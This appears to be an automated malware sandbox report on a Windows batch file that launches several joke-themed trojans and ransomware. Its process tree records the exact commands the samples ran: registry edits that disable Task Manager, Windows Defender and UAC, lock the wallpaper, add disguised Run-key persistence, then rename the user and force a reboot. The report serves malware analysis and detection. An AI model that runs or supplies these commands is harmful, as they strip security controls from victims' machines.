Analysis

  • max time kernel
    11s
  • max time network
    14s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    08-11-2024 14:13

Errors

Reason
Machine shutdown

General

  • Target

    Dest/Start.bat

  • Size

    59B

  • MD5

    e802087cce5e0317e5badc64380d207b

  • SHA1

    64e1f2a59da7caf0f1c206464724863db8829aaf

  • SHA256

    c72166dd069087612430540b67d4771bae3899e9d928b587ca8ac24dd458c2e3

  • SHA512

    e82a80520f5a9119bb45ce83a327f99dafc60c7b97b7754ac2ffdcbbea02c027a85f639f525da4ba869ae36837832d95eb846fd6c17304a749d094185691f406

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Disables Task Manager via registry modification
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 6 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
      "covid20.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4780
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:572
        • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
          clwcp c:\covid20\bg.bmp
          4⤵
          • Executes dropped EXE
          • Sets desktop wallpaper using registry
          • System Location Discovery: System Language Discovery
          PID:752
        • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
          flasher 5 c:\covid20\covid.bmp
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4088
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2108
    • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
      "HorrorBob2.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:828
        • C:\Windows\SysWOW64\cscript.exe
          cscript prompt.vbs
          4⤵
            PID:1876
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:5052
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
            4⤵
            • Sets desktop wallpaper using registry
            • System Location Discovery: System Language Discovery
            PID:4156
          • C:\Windows\SysWOW64\rundll32.exe
            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1368
          • C:\Windows\SysWOW64\reg.exe
            reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:3356
          • C:\Windows\SysWOW64\reg.exe
            Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3468
          • C:\Windows\SysWOW64\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            4⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:4764
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
            4⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:3344
          • C:\Windows\SysWOW64\net.exe
            net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2644
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3352
          • C:\Windows\SysWOW64\shutdown.exe
            shutdown /r /t 00
            4⤵
              PID:756
        • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
          "HorrorRansom 1.0 Final.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2116
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd""
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3408
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:3184
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
              4⤵
              • Sets desktop wallpaper using registry
              • System Location Discovery: System Language Discovery
              PID:1420
            • C:\Windows\SysWOW64\reg.exe
              reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:3680
            • C:\Windows\SysWOW64\reg.exe
              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              4⤵
              • UAC bypass
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:3096
            • C:\Windows\SysWOW64\reg.exe
              Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1672
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
              4⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:4364
            • C:\Windows\SysWOW64\shutdown.exe
              shutdown /r /t 00
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:3152
        • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
          "HorrorTrojan Ultimate Edition.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\system32\wscript.exe
            "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs //Nologo
            3⤵
              PID:4332
          • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
            "HorrorTrojan123.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:1724
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x4 /state0:0xa3a06855 /state1:0x41c64e6d
          1⤵
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious use of SetWindowsHookEx
          PID:2552
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
          1⤵
            PID:3152
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
            1⤵
              PID:1876
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              1⤵
                PID:4156
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                1⤵
                  PID:756
                • C:\Windows\system32\DllHost.exe
                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                  1⤵
                    PID:572

Network

MITRE ATT&CK Enterprise v15

Downloads

                  • C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs

                    Filesize

                    2KB

                    MD5

                    a0679dce64fcf875f4208b823d4b85c0

                    SHA1

                    85abe3673db82bfe5b2c207dc98648e32afffea0

                    SHA256

                    85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1

                    SHA512

                    1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe

                    Filesize

                    505KB

                    MD5

                    e62ee6f1efc85cb36d62ab779db6e4ec

                    SHA1

                    da07ec94cf2cb2b430e15bd0c5084996a47ee649

                    SHA256

                    13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a

                    SHA512

                    8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\bg.bmp

                    Filesize

                    21.5MB

                    MD5

                    cb065726febf9c1a581f3008e678f524

                    SHA1

                    f9a0058a57213cf7ce72eddf0616a938c8f4f4b1

                    SHA256

                    d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f

                    SHA512

                    b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs

                    Filesize

                    130B

                    MD5

                    e61624dced063c4ba5352bf487f12410

                    SHA1

                    40bd08928900cd97f444ffaa78d93dcaf913b274

                    SHA256

                    82ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3

                    SHA512

                    2a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat

                    Filesize

                    445B

                    MD5

                    b08e02e536917f897acb2d21f42f0a97

                    SHA1

                    a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45

                    SHA256

                    2c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c

                    SHA512

                    1d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bmp

                    Filesize

                    147KB

                    MD5

                    738bbd119d8877f8342e1ff00fe60dff

                    SHA1

                    fc11d85e3c5b46bd877e06985fec1a601ce396ed

                    SHA256

                    548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb

                    SHA512

                    f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe

                    Filesize

                    246KB

                    MD5

                    9254ca1da9ff8ad492ca5fa06ca181c6

                    SHA1

                    70fa62e6232eae52467d29cf1c1dacb8a7aeab90

                    SHA256

                    30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

                    SHA512

                    a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

                  • C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd

                    Filesize

                    1KB

                    MD5

                    47f426fb3883f2da30e9aa2a7d693fa5

                    SHA1

                    50d843d68817717f21ba96d26a571ad996a5e35a

                    SHA256

                    b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b

                    SHA512

                    2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb

                  • C:\Users\Admin\AppData\Local\Temp\C18B.tmp\HostFile.exe

                    Filesize

                    72KB

                    MD5

                    c875f76e521f520404401122bd82630a

                    SHA1

                    3b1c78420a55b9a768b28168753c4e22982421ef

                    SHA256

                    a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11

                    SHA512

                    b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b

                  • C:\Users\Admin\AppData\Local\Temp\C18B.tmp\note.bmp

                    Filesize

                    5.9MB

                    MD5

                    ed30c76a614ec8db5e4ac22e2929f53d

                    SHA1

                    27ab24ede0ec37cedd2cbf4d9f7135375f031fa4

                    SHA256

                    96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a

                    SHA512

                    ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b

                  • C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat

                    Filesize

                    5KB

                    MD5

                    b11c0b55dba339bbe3169584fa0eedd8

                    SHA1

                    8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9

                    SHA256

                    f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073

                    SHA512

                    8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

                  • C:\Users\Admin\AppData\Local\Temp\C498.tmp\Service64.exe

                    Filesize

                    11.4MB

                    MD5

                    b53852cb556ec28efc39b986caddb791

                    SHA1

                    5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a

                    SHA256

                    ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a

                    SHA512

                    7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599

                  • C:\Users\Admin\AppData\Local\Temp\C498.tmp\blood.bmp

                    Filesize

                    3.8MB

                    MD5

                    040d29b801e3488f7aee3f9708128eea

                    SHA1

                    433591a971325f7529cbb7a1d16645ff65ee10c7

                    SHA256

                    fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de

                    SHA512

                    79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

                  • memory/752-78-0x0000000000400000-0x0000000000484000-memory.dmp

                    Filesize

                    528KB

                  • memory/2116-1-0x0000000000400000-0x0000000000A12000-memory.dmp

                    Filesize

                    6.1MB

                  • memory/2116-81-0x0000000000400000-0x0000000000A12000-memory.dmp

                    Filesize

                    6.1MB

                  • memory/4088-77-0x0000000000400000-0x00000000004A4000-memory.dmp

                    Filesize

                    656KB

                  • memory/4780-0-0x0000000000400000-0x0000000001A7B000-memory.dmp

                    Filesize

                    22.5MB

                  • memory/4780-79-0x0000000000400000-0x0000000001A7B000-memory.dmp

                    Filesize

                    22.5MB

                  • memory/5032-2-0x0000000000400000-0x000000000132F000-memory.dmp

                    Filesize

                    15.2MB

                  • memory/5032-76-0x0000000000400000-0x000000000132F000-memory.dmp

                    Filesize

                    15.2MB